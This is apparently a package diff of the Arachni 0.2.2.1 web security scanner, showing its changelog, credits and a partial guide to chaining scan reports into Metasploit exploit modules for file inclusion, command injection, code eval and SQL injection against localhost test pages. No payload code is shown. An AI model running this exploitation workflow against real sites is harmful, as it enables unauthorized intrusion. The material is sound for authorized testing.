arachni 0.2.2.1
- data/ACKNOWLEDGMENTS.md +14 -0
- data/AUTHORS.md +6 -0
- data/CHANGELOG.md +162 -0
- data/CONTRIBUTORS.md +10 -0
- data/EXPLOITATION.md +429 -0
- data/HACKING.md +101 -0
- data/LICENSE.md +341 -0
- data/README.md +350 -0
- data/Rakefile +86 -0
- data/bin/arachni +22 -0
- data/bin/arachni_web +77 -0
- data/bin/arachni_xmlrpc +21 -0
- data/bin/arachni_xmlrpcd +82 -0
- data/bin/arachni_xmlrpcd_monitor +74 -0
- data/conf/README.webui.yaml.txt +44 -0
- data/conf/webui.yaml +11 -0
- data/external/metasploit/LICENSE +24 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_exec.rb +142 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_path_traversal.rb +113 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_php_eval.rb +150 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_php_include.rb +141 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_sqlmap.rb +92 -0
- data/external/metasploit/plugins/arachni.rb +536 -0
- data/getoptslong.rb +241 -0
- data/lib/anemone.rb +2 -0
- data/lib/anemone/cookie_store.rb +35 -0
- data/lib/anemone/core.rb +371 -0
- data/lib/anemone/exceptions.rb +5 -0
- data/lib/anemone/http.rb +144 -0
- data/lib/anemone/page.rb +337 -0
- data/lib/anemone/page_store.rb +160 -0
- data/lib/anemone/storage.rb +34 -0
- data/lib/anemone/storage/base.rb +75 -0
- data/lib/anemone/storage/exceptions.rb +15 -0
- data/lib/anemone/storage/mongodb.rb +89 -0
- data/lib/anemone/storage/pstore.rb +50 -0
- data/lib/anemone/storage/redis.rb +90 -0
- data/lib/anemone/storage/tokyo_cabinet.rb +57 -0
- data/lib/anemone/tentacle.rb +40 -0
- data/lib/arachni.rb +16 -0
- data/lib/audit_store.rb +346 -0
- data/lib/component_manager.rb +293 -0
- data/lib/component_options.rb +395 -0
- data/lib/exceptions.rb +76 -0
- data/lib/framework.rb +637 -0
- data/lib/http.rb +809 -0
- data/lib/issue.rb +302 -0
- data/lib/module.rb +4 -0
- data/lib/module/auditor.rb +455 -0
- data/lib/module/base.rb +188 -0
- data/lib/module/element_db.rb +158 -0
- data/lib/module/key_filler.rb +87 -0
- data/lib/module/manager.rb +87 -0
- data/lib/module/output.rb +68 -0
- data/lib/module/trainer.rb +240 -0
- data/lib/module/utilities.rb +110 -0
- data/lib/options.rb +547 -0
- data/lib/parser.rb +2 -0
- data/lib/parser/auditable.rb +522 -0
- data/lib/parser/elements.rb +296 -0
- data/lib/parser/page.rb +149 -0
- data/lib/parser/parser.rb +717 -0
- data/lib/plugin.rb +4 -0
- data/lib/plugin/base.rb +110 -0
- data/lib/plugin/manager.rb +162 -0
- data/lib/report.rb +4 -0
- data/lib/report/base.rb +119 -0
- data/lib/report/manager.rb +92 -0
- data/lib/rpc/xml/client/base.rb +71 -0
- data/lib/rpc/xml/client/dispatcher.rb +49 -0
- data/lib/rpc/xml/client/instance.rb +88 -0
- data/lib/rpc/xml/server/base.rb +90 -0
- data/lib/rpc/xml/server/dispatcher.rb +357 -0
- data/lib/rpc/xml/server/framework.rb +206 -0
- data/lib/rpc/xml/server/instance.rb +191 -0
- data/lib/rpc/xml/server/module/manager.rb +46 -0
- data/lib/rpc/xml/server/options.rb +124 -0
- data/lib/rpc/xml/server/output.rb +299 -0
- data/lib/rpc/xml/server/plugin/manager.rb +58 -0
- data/lib/ruby.rb +5 -0
- data/lib/ruby/object.rb +32 -0
- data/lib/ruby/string.rb +74 -0
- data/lib/ruby/xmlrpc/server.rb +27 -0
- data/lib/spider.rb +200 -0
- data/lib/typhoeus/request.rb +91 -0
- data/lib/typhoeus/response.rb +34 -0
- data/lib/ui/cli/cli.rb +744 -0
- data/lib/ui/cli/output.rb +279 -0
- data/lib/ui/web/log.rb +82 -0
- data/lib/ui/web/output_stream.rb +94 -0
- data/lib/ui/web/report_manager.rb +222 -0
- data/lib/ui/web/server.rb +903 -0
- data/lib/ui/web/server/db/placeholder +0 -0
- data/lib/ui/web/server/public/banner.png +0 -0
- data/lib/ui/web/server/public/bodybg-small.png +0 -0
- data/lib/ui/web/server/public/bodybg.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/pbar-ani.gif +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_flat_0_aaaaaa_40x100.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_55_fbf9ee_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_65_ffffff_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_75_dadada_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_75_e6e6e6_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_95_fef1ec_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_highlight-soft_75_cccccc_1x100.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_222222_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_2e83ff_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_454545_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_888888_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_cd0a0a_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/jquery-ui-1.8.9.custom.css +573 -0
- data/lib/ui/web/server/public/favicon.ico +0 -0
- data/lib/ui/web/server/public/footer.jpg +0 -0
- data/lib/ui/web/server/public/icons/error.png +0 -0
- data/lib/ui/web/server/public/icons/info.png +0 -0
- data/lib/ui/web/server/public/icons/ok.png +0 -0
- data/lib/ui/web/server/public/icons/status.png +0 -0
- data/lib/ui/web/server/public/js/jquery-1.4.4.min.js +167 -0
- data/lib/ui/web/server/public/js/jquery-ui-1.8.9.custom.min.js +781 -0
- data/lib/ui/web/server/public/logo.png +0 -0
- data/lib/ui/web/server/public/nav-left.jpg +0 -0
- data/lib/ui/web/server/public/nav-right.jpg +0 -0
- data/lib/ui/web/server/public/nav-selected-left.jpg +0 -0
- data/lib/ui/web/server/public/nav-selected-right.jpg +0 -0
- data/lib/ui/web/server/public/reports/placeholder +1 -0
- data/lib/ui/web/server/public/sidebar-bottom.jpg +0 -0
- data/lib/ui/web/server/public/sidebar-h4.jpg +0 -0
- data/lib/ui/web/server/public/sidebar-top.jpg +0 -0
- data/lib/ui/web/server/public/spider.png +0 -0
- data/lib/ui/web/server/public/style.css +604 -0
- data/lib/ui/web/server/tmp/placeholder +0 -0
- data/lib/ui/web/server/views/dispatcher.erb +85 -0
- data/lib/ui/web/server/views/dispatcher_error.erb +14 -0
- data/lib/ui/web/server/views/error.erb +1 -0
- data/lib/ui/web/server/views/flash.erb +18 -0
- data/lib/ui/web/server/views/home.erb +14 -0
- data/lib/ui/web/server/views/instance.erb +213 -0
- data/lib/ui/web/server/views/layout.erb +95 -0
- data/lib/ui/web/server/views/log.erb +40 -0
- data/lib/ui/web/server/views/modules.erb +71 -0
- data/lib/ui/web/server/views/options.erb +23 -0
- data/lib/ui/web/server/views/output_results.erb +51 -0
- data/lib/ui/web/server/views/plugins.erb +42 -0
- data/lib/ui/web/server/views/report_formats.erb +30 -0
- data/lib/ui/web/server/views/reports.erb +55 -0
- data/lib/ui/web/server/views/settings.erb +120 -0
- data/lib/ui/web/server/views/welcome.erb +38 -0
- data/lib/ui/xmlrpc/dispatcher_monitor.rb +204 -0
- data/lib/ui/xmlrpc/xmlrpc.rb +843 -0
- data/logs/placeholder +0 -0
- data/metamodules/autothrottle.rb +74 -0
- data/metamodules/timeout_notice.rb +118 -0
- data/metamodules/uniformity.rb +98 -0
- data/modules/audit/code_injection.rb +136 -0
- data/modules/audit/code_injection_timing.rb +115 -0
- data/modules/audit/code_injection_timing/payloads.txt +4 -0
- data/modules/audit/csrf.rb +301 -0
- data/modules/audit/ldapi.rb +103 -0
- data/modules/audit/ldapi/errors.txt +26 -0
- data/modules/audit/os_cmd_injection.rb +103 -0
- data/modules/audit/os_cmd_injection/payloads.txt +2 -0
- data/modules/audit/os_cmd_injection_timing.rb +104 -0
- data/modules/audit/os_cmd_injection_timing/payloads.txt +3 -0
- data/modules/audit/path_traversal.rb +141 -0
- data/modules/audit/response_splitting.rb +105 -0
- data/modules/audit/rfi.rb +193 -0
- data/modules/audit/sqli.rb +120 -0
- data/modules/audit/sqli/regexp_ids.txt +90 -0
- data/modules/audit/sqli_blind_rdiff.rb +321 -0
- data/modules/audit/sqli_blind_timing.rb +103 -0
- data/modules/audit/sqli_blind_timing/payloads.txt +51 -0
- data/modules/audit/trainer.rb +89 -0
- data/modules/audit/unvalidated_redirect.rb +90 -0
- data/modules/audit/xpath.rb +104 -0
- data/modules/audit/xpath/errors.txt +26 -0
- data/modules/audit/xss.rb +99 -0
- data/modules/audit/xss_event.rb +134 -0
- data/modules/audit/xss_path.rb +125 -0
- data/modules/audit/xss_script_tag.rb +112 -0
- data/modules/audit/xss_tag.rb +112 -0
- data/modules/audit/xss_uri.rb +125 -0
- data/modules/recon/allowed_methods.rb +104 -0
- data/modules/recon/backdoors.rb +131 -0
- data/modules/recon/backdoors/filenames.txt +16 -0
- data/modules/recon/backup_files.rb +177 -0
- data/modules/recon/backup_files/extensions.txt +28 -0
- data/modules/recon/common_directories.rb +138 -0
- data/modules/recon/common_directories/directories.txt +265 -0
- data/modules/recon/common_files.rb +138 -0
- data/modules/recon/common_files/filenames.txt +17 -0
- data/modules/recon/directory_listing.rb +171 -0
- data/modules/recon/grep/captcha.rb +62 -0
- data/modules/recon/grep/credit_card.rb +85 -0
- data/modules/recon/grep/cvs_svn_users.rb +73 -0
- data/modules/recon/grep/emails.rb +59 -0
- data/modules/recon/grep/html_objects.rb +53 -0
- data/modules/recon/grep/private_ip.rb +54 -0
- data/modules/recon/grep/ssn.rb +53 -0
- data/modules/recon/htaccess_limit.rb +82 -0
- data/modules/recon/http_put.rb +95 -0
- data/modules/recon/interesting_responses.rb +118 -0
- data/modules/recon/unencrypted_password_forms.rb +119 -0
- data/modules/recon/webdav.rb +126 -0
- data/modules/recon/xst.rb +107 -0
- data/path_extractors/anchors.rb +35 -0
- data/path_extractors/forms.rb +35 -0
- data/path_extractors/frames.rb +38 -0
- data/path_extractors/generic.rb +39 -0
- data/path_extractors/links.rb +35 -0
- data/path_extractors/meta_refresh.rb +39 -0
- data/path_extractors/scripts.rb +37 -0
- data/path_extractors/sitemap.rb +31 -0
- data/plugins/autologin.rb +137 -0
- data/plugins/content_types.rb +90 -0
- data/plugins/cookie_collector.rb +99 -0
- data/plugins/form_dicattack.rb +185 -0
- data/plugins/healthmap.rb +94 -0
- data/plugins/http_dicattack.rb +133 -0
- data/plugins/metamodules.rb +118 -0
- data/plugins/proxy.rb +248 -0
- data/plugins/proxy/server.rb +66 -0
- data/plugins/waf_detector.rb +184 -0
- data/profiles/comprehensive.afp +74 -0
- data/profiles/full.afp +75 -0
- data/reports/afr.rb +59 -0
- data/reports/ap.rb +55 -0
- data/reports/html.rb +179 -0
- data/reports/html/default.erb +967 -0
- data/reports/metareport.rb +139 -0
- data/reports/metareport/arachni_metareport.rb +174 -0
- data/reports/plugin_formatters/html/content_types.rb +82 -0
- data/reports/plugin_formatters/html/cookie_collector.rb +66 -0
- data/reports/plugin_formatters/html/form_dicattack.rb +54 -0
- data/reports/plugin_formatters/html/healthmap.rb +76 -0
- data/reports/plugin_formatters/html/http_dicattack.rb +54 -0
- data/reports/plugin_formatters/html/metaformatters/timeout_notice.rb +65 -0
- data/reports/plugin_formatters/html/metaformatters/uniformity.rb +71 -0
- data/reports/plugin_formatters/html/metamodules.rb +93 -0
- data/reports/plugin_formatters/html/waf_detector.rb +54 -0
- data/reports/plugin_formatters/stdout/content_types.rb +73 -0
- data/reports/plugin_formatters/stdout/cookie_collector.rb +61 -0
- data/reports/plugin_formatters/stdout/form_dicattack.rb +52 -0
- data/reports/plugin_formatters/stdout/healthmap.rb +72 -0
- data/reports/plugin_formatters/stdout/http_dicattack.rb +53 -0
- data/reports/plugin_formatters/stdout/metaformatters/timeout_notice.rb +55 -0
- data/reports/plugin_formatters/stdout/metaformatters/uniformity.rb +68 -0
- data/reports/plugin_formatters/stdout/metamodules.rb +89 -0
- data/reports/plugin_formatters/stdout/waf_detector.rb +48 -0
- data/reports/plugin_formatters/xml/content_types.rb +91 -0
- data/reports/plugin_formatters/xml/cookie_collector.rb +70 -0
- data/reports/plugin_formatters/xml/form_dicattack.rb +57 -0
- data/reports/plugin_formatters/xml/healthmap.rb +82 -0
- data/reports/plugin_formatters/xml/http_dicattack.rb +57 -0
- data/reports/plugin_formatters/xml/metaformatters/timeout_notice.rb +67 -0
- data/reports/plugin_formatters/xml/metaformatters/uniformity.rb +82 -0
- data/reports/plugin_formatters/xml/metamodules.rb +91 -0
- data/reports/plugin_formatters/xml/waf_detector.rb +58 -0
- data/reports/stdout.rb +182 -0
- data/reports/txt.rb +77 -0
- data/reports/xml.rb +231 -0
- data/reports/xml/buffer.rb +98 -0
- metadata +516 -0
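--- a/data/ACKNOWLEDGMENTS.md
+++ b/data/ACKNOWLEDGMENTS.md
@@ -0,0 +1,14 @@
+# Acknowledgments
+
+I’d like to thank:
+
+- Mr. Miles Wolbe (owner of [TinyApps.Org](http://tinyapps.org/))
+- Mr. Colin Davis (owner of [Lonava.com](http://lonava.com/))
+- The good folks from [KATHO.be](http://www.katho.be/)
+- Scott Buffington (owner of [BrutalDeluxe.us](http://brutaldeluxe.us/))
+- The people who preferred to remain anonymous
+
+for allowing me to test Arachni against their websites during the early stages of development.
+
+All the people on [GitHub](http://github.com/Zapotek/arachni/issues)
+that have submitted bugs and given constructive feedback.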
data/AUTHORS.md
ADDED
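--- a/data/CHANGELOG.md
+++ b/data/CHANGELOG.md
@@ -0,0 +1,162 @@
+
+# ChangeLog
+
+## Version 0.2.2.1 _(February 13, 2011)_
+- Web UI v0.1-pre (Utilizing the Client - Dispatch-server XMLRPC architecture) (**New**)
+- Basically a front-end to the XMLRPC client
+- Support for parallel scans
+- Report management
+- Can be used to monitor and control any running Dispatcher
+- Changed classification from "Vulnerabilities" to "Issues" (**New**)
+- Improved detection of custom 404 pages.
+- Reports updated to show plug-in results.
+- Updated framework-wide cookie handling.
+- Added parameter flipping functionality ( cheers to Nilesh Bhosale <nilesh at gslab.com >)
+- Major performance optimizations (4x faster in most tests)
+- All modules now use asynchronous requests and are optimized for highest traffic efficiency
+- All index Arrays have been replaced by Sets to minimize look-up times
+- Mark-up parsing has been reduced dramatically
+- File I/O blocking in modules has been eliminated
+- Crawler
+- Improved performance
+- Added '--spider-first" option (**New**)
+- Substituted the XMLRPC server with an XMLRPC dispatch server (**New**)
+- Multiple clients
+- Parallel scans
+- Extensive logging
+- SSL cert based client authentication
+- Added modules (**New**)
+- Audit
+- XSS in event attributes of HTML elements
+- XSS in HTML tags
+- XSS in HTML 'script' tags
+- Blind SQL injection using timing attacks
+- Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
+- Blind OS command injection using timing attacks (*nix, Windows)
+- Recon
+- Common backdoors -- Looks for common shell names
+- .htaccess LIMIT misconfiguration
+- Interesting responses -- Listens to all traffic and logs interesting server messages
+- HTML object grepper
+- E-mail address disclosure
+- US Social Security Number disclosure
+- Forceful directory listing
+- Added plugins (**New**)
+- Dictionary attacker for HTTP Auth
+- Dictionary attacker for form based authentication
+- Cookie collector -- Listens to all traffic and logs changes in cookies
+- Healthmap -- Generates sitemap showing the health of each crawled/audited URL
+- Content-types -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files
+- WAF (Web Application Firewall) Detector
+- MetaModules -- Loads and runs high-level meta-analysis modules pre/mid/post-scan
+- AutoThrottle -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
+- TimeoutNotice -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with.</br>
+It also points out the danger of DoS attacks against pages that perform heavy-duty processing.
+- Uniformity -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.
+
+- New behavior on Ctrl+C
+- The system continues to run in the background instead of pausing
+- The user is presented with an auto-refreshing report and progress stats
+- Updated module API
+- Timing/delay attacks have been abstracted and simplified via helper methods
+- The modules are given access to vector skipping decisions
+- Simplified issue logging
+- Added the option of substring matching instead of regexp matching in order to improve performance.
+- Substituted regular expression matching with substring matching wherever possible.
+- Reports:
+- Added plug-in formatter components allowing plug-ins to have a say in how their results are presented (**New**)
+- New HTML report (Cheers to [Christos Chiotis](mailto:chris@survivetheinternet.com) for designing the new HTML report template.) (**New**)
+- Updated reports to include Plug-in results:
+- XML report
+- Stdout report
+- Text report
+
+## Version 0.2.1 _(November 25, 2010)_
+- Major performance improvements
+- Major system refactoring and code clean-up
+- Major module API refactoring providing even more flexibility regarding element auditing and manipulation
+- Integration with the Metasploit Framework via: (**New**)
+- ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
+- Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
+- Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.
+- Improved Blind SQL Injection module, significantly less requests per audit.
+- XMLRPC server (**New**)
+- XMLRPC CLI client (**New**)
+- NTLM authentication support (**New**)
+- Support for path extractor modules for the Spider (**New**)
+- Path extractors: (**New**)
+- Generic -- extracts URLs from arbitrary text
+- Anchors
+- Form actions
+- Frame sources
+- Links
+- META refresh
+- Script 'src' and script code
+- Sitemap
+- Plug-in support -- allowing the framework to be extended with virtually any functionality (**New**).
+- Added plug-ins: (**New**)
+- Passive proxy
+- Automated login
+- Added modules: (**New**)
+- Audit
+- XPath injection
+- LDAP injection
+- Recon
+- CVS/SVN user disclosure
+- Private IP address disclosure
+- Robot file reader (in the Common Files module)
+- XST
+- WebDAV detection
+- Allowed HTTP methods
+- Credit card number disclosure
+- HTTP PUT support
+- Extended proxy support (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0). (**New**)
+
+
+## Version 0.2 _(October 14, 2010)_
+
+- Improved output.
+- Increased context awareness.
+- Extensive debugging output capabilities.
+- Added simple stats at the end of scans.
+- Rewritten HTTP interface.
+- High-performance asynchronous HTTP requests.
+- Adjustable HTTP request concurrency limit.
+- Adjustable HTTP response harvests.
+- Custom 404 page detection.
+- Optimized Trainer subsystem.
+- Invoked when it is most likely to detect new vectors.
+- Can be invoked by individual modules on-demand,
+forcing Arachni to learn from the HTTP responses they will cause -- a great asset to Fuzzers.
+- Refactored and improved Auditor.
+- No redundant requests, except when required by modules.
+- Better parameter handling.
+- Speed optimizations.
+- Added differential analysis to determine whether a vulnerability needs manual verification.
+- Refactored and improved module API.
+- Major API clean up.
+- With facilities providing more control and power over the audit process.
+- Significantly increased ease of development.
+- Modules have total flexibility and control over input combinations,
+injection values and their formating -- if they need to.
+- Modules can opt for sync or async HTTP requests (Default: async)
+- Improved interrupt handling
+- Scans can be paused/resumed at any time.
+- In the event of a system exit or user cancellation reports will still be created
+using whatever data were gathered during runtime.
+- When the scan is paused the user will be presented with the results gathered thus far.
+- Improved configuration profile handling
+- Added pre-configured profiles
+- Multiple profiles can be loaded at once
+- Ability to show running profiles as CLI arguments
+- Overall module improvements and optimizations.
+- New modules for:
+- Blind SQL Injection, using reverse-diff analysis.
+- Trainer, probes all inputs of a given page, in order to uncover new input vectors, and forces Arachni to learn from the responses.
+- Unvalidated redirects.
+- Forms that transmit passwords in clear text.
+- CSRF, implementing 4-pass rDiff analysis to drastically reduce noise.
+- Overall report improvements and optimizations.
+- New reports
+- Plain text report
+- XML report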
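--- a/data/CONTRIBUTORS.md
+++ b/data/CONTRIBUTORS.md
@@ -0,0 +1,10 @@
+# Contributors
+
+These are the people that helped improve Arachni either by submitting code, suggestions or testing it.
+
+- [Matías Aereal Aeón](http://mfsec.com.ar/), **Arachni's official tester**.
+- [Christos Chiotis](mailto:chris@survivetheinternet.com) for designing the new HTML report template.
+- [Steve Pinkham](http://github.com/spinkham) for beta testing and patches.
+- [Aung Khant](mailto:aungkhant@yehg.net) for general suggestions.
+
+A big thanks to my buddy [Andreas](mailto:rainmakergr@gmail.com) for the original spider drawing used in the project graphics.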
data/EXPLOITATION.md
ADDED
@@ -0,0 +1,429 @@
|
|
1
|
+
# WebApp exploitation with Arachni and Metasploit
|
2
|
+
|
3
|
+
Arachni provides advanced exploitation techniques via the:
|
4
|
+
|
5
|
+
- ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
|
6
|
+
- Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
|
7
|
+
- Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.
|
8
|
+
|
9
|
+
|
10
|
+
##Installation
|
11
|
+
|
12
|
+
To install the necessary files all you need to do is copy the contents of the "external/metasploit" directory to Metasploit's root.
|
13
|
+
$ cp -R arachni/external/metasploit/* metasploit/
|
14
|
+
|
15
|
+
##Usage
|
16
|
+
|
17
|
+
###Creating the Metareport
|
18
|
+
|
19
|
+
#### New scan
|
20
|
+
$ ./arachni.rb http://localhost/~zapotek/tests/ --report=metareport:outfile=localhost.afr.msf
|
21
|
+
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
|
22
|
+
Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
|
23
|
+
<zapotek@segfault.gr>
|
24
|
+
(With the support of the community and the Arachni Team.)
|
25
|
+
|
26
|
+
Website: http://github.com/Zapotek/arachni
|
27
|
+
Documentation: http://github.com/Zapotek/arachni/wiki
|
28
|
+
|
29
|
+
|
30
|
+
[~] No modules were specified.
|
31
|
+
[~] -> Will run all mods.
|
32
|
+
[~] No audit options were specified.
|
33
|
+
[~] -> Will audit links, forms and cookies.
|
34
|
+
|
35
|
+
[...snipping a whole lot of scan output...]
|
36
|
+
|
37
|
+
[*] Creating file for the Metasploit framework...
|
38
|
+
[*] Saved in 'localhost.afr.msf'.
|
39
|
+
|
40
|
+
[*] Dumping audit results in 'metareport.afr'.
|
41
|
+
[*] Done!
|
42
|
+
|
43
|
+
#### Converting an existing report
|
44
|
+
To convert a standard Arachni Framework Report (.afr) file to a Metareport (.afr.msf) file:
|
45
|
+
|
46
|
+
$ ./arachni.rb --repload=localhost.afr --report=metareport:outfile=localhost.afr.msf
|
47
|
+
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
|
48
|
+
Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
|
49
|
+
<zapotek@segfault.gr>
|
50
|
+
(With the support of the community and the Arachni Team.)
|
51
|
+
|
52
|
+
Website: http://github.com/Zapotek/arachni
|
53
|
+
Documentation: http://github.com/Zapotek/arachni/wiki
|
54
|
+
|
55
|
+
|
56
|
+
|
57
|
+
[*] Creating file for the Metasploit framework...
|
58
|
+
[*] Saved in 'localhost.afr.msf'.
|
59
|
+
|
60
|
+
|
61
|
+
### Using the Arachni plug-in via Metasploit
|
62
|
+
|
63
|
+
#### Loading the ArachniMetareport
|
64
|
+
$ ./msfconsole # Start the MSF
|
65
|
+
|
66
|
+
888 888 d8b888
|
67
|
+
888 888 Y8P888
|
68
|
+
888 888 888
|
69
|
+
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
|
70
|
+
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
|
71
|
+
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
|
72
|
+
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
|
73
|
+
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
|
74
|
+
888
|
75
|
+
888
|
76
|
+
888
|
77
|
+
|
78
|
+
|
79
|
+
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
|
80
|
+
+ -- --=[ 620 exploits - 307 auxiliary
|
81
|
+
+ -- --=[ 215 payloads - 27 encoders - 8 nops
|
82
|
+
=[ svn r10844 updated today (2010.10.29)
|
83
|
+
|
84
|
+
msf > load arachni # Load the Arachni plug-in
|
85
|
+
[*] Successfully loaded plugin: arachni
|
86
|
+
msf > arachni_load ../arachni/localhost.afr.msf # Load the ArachniMetareport using the Arachni plug-in
|
87
|
+
[*] Loading report...
|
88
|
+
[*] Loaded 19 vulnerabilities.
|
89
|
+
|
90
|
+
|
91
|
+
Unique exploits
|
92
|
+
===============
|
93
|
+
|
94
|
+
ID Exploit Description
|
95
|
+
-- ------- -----------
|
96
|
+
1 unix/webapp/arachni_php_include
|
97
|
+
This module allows complex HTTP requests to be crafted in order to
|
98
|
+
allow exploitation of PHP remote file inclusion vulnerabilities.
|
99
|
+
|
100
|
+
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
|
101
|
+
i.e. where the payload should go.
|
102
|
+
|
103
|
+
Supported vectors: GET, POST, COOKIE, HEADER.
|
104
|
+
(Mainly for use with the Arachni plug-in.)
|
105
|
+
|
106
|
+
2 unix/webapp/arachni_exec
|
107
|
+
This module allows complex HTTP requests to be crafted in order to
|
108
|
+
allow exploitation of command injection vulnerabilities in Unix-like platforms.
|
109
|
+
|
110
|
+
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
|
111
|
+
i.e. where the payload should go.
|
112
|
+
|
113
|
+
Supported vectors: GET, POST, COOKIE, HEADER.
|
114
|
+
(Mainly for use with the Arachni plug-in.)
|
115
|
+
|
116
|
+
3 unix/webapp/arachni_php_eval
|
117
|
+
This module allows complex HTTP requests to be crafted in order to
|
118
|
+
allow exploitation of PHP eval() vulnerabilities in Unix-like platforms.
|
119
|
+
|
120
|
+
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
|
121
|
+
i.e. where the payload should go.
|
122
|
+
|
123
|
+
Supported vectors: GET, POST, COOKIE, HEADER.
|
124
|
+
(Mainly for use with the Arachni plug-in.)
|
125
|
+
|
126
|
+
4 unix/webapp/arachni_sqlmap
|
127
|
+
|
128
|
+
This module is designed to be used with the Arachni plug-in.
|
129
|
+
|
130
|
+
From the original:
|
131
|
+
|
132
|
+
This module launches an sqlmap session.
|
133
|
+
sqlmap is an automatic SQL injection tool developed in Python.
|
134
|
+
Its goal is to detect and take advantage of SQL injection
|
135
|
+
vulnerabilities on web applications. Once it detects one
|
136
|
+
or more SQL injections on the target host, the user can
|
137
|
+
choose among a variety of options to perform an extensive
|
138
|
+
back-end database management system fingerprint, retrieve
|
139
|
+
DBMS session user and database, enumerate users, password
|
140
|
+
hashes, privileges, databases, dump entire or user
|
141
|
+
specific DBMS tables/columns, run his own SQL SELECT
|
142
|
+
statement, read specific files on the file system and much
|
143
|
+
more.
|
144
|
+
|
145
|
+
|
146
|
+
|
147
|
+
|
148
|
+
Vulnerabilities
|
149
|
+
===============
|
150
|
+
|
151
|
+
ID Host Path Name Method Params Exploit
|
152
|
+
-- ---- ---- ---- ------ ------ -------
|
153
|
+
1 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
154
|
+
2 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
155
|
+
3 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
156
|
+
4 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
157
|
+
5 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
158
|
+
6 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
159
|
+
7 127.0.0.1 /~zapotek/tests/cookies/eval.php Code injection COOKIE {"eval"=>"%3BXXinjectionXX"} unix/webapp/arachni_php_eval
|
160
|
+
8 127.0.0.1 /~zapotek/tests/forms/eval.php Code injection POST {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
161
|
+
9 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
162
|
+
10 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
163
|
+
11 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
164
|
+
12 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
165
|
+
13 127.0.0.1 /~zapotek/tests/forms/sqli.php SQL Injection POST {"sql_inj"=>"1"} unix/webapp/arachni_sqlmap
|
166
|
+
